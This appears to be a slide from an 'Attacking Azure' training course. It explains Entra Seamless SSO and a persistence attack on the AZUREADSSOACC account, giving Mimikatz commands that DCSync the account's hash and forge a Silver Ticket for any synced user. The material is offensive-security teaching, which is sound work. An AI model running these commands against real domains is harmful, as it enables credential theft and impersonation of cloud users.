Seamless SSO

Entra Seamless SSO automatically signs users in when they are on on-prem domain-joined machine. There is no need to use passwords to log in to Entra ID and on-prem applications. • Supported by both PHS and PTA. • When Seamless SSO is enabled, a computer account AZUREADSSOACC is created in the on-prem AD. This account's Kerberos decryption key is shared with Entra ID. • Entra ID exposes an endpoint (https://autologon.microsoftazuread-sso.com) that accepts Kerberos tickets. Domain-joined machine's browser forwards the tickets to this endpoint for SSO. Attacking Azure © Altered Security. All rights reserved 227AlteredSecurity Persistence - AZUREADSSOACC - On-Prem to Cloud • Password/key of the AZUREADSSOACC never changes. • If we can compromise the NTLM hash of the AZUREADSSOACC machine account, we can create Silver Tickets for any synced on-prem user! Invoke-Mimikatz -Command '"lsadump::dcsync /user:defeng\azureadssoacc$ /domain:defeng.corp /dc:defeng-dc.defeng.corp"' • We just need the userPrincipalName and SID of the user to create the Silver ticket that can be used from any machine connected to the internet Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin1 /sid:S-1-5- 21-938785110-3291390659-577725712 /id:1108 /domain:defeng.corp /rc4:<> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"' • Our lab environment (for both PHS and PTA) uses different UPN prefixes for on-prem and Azure domain so the SSO will not work ;)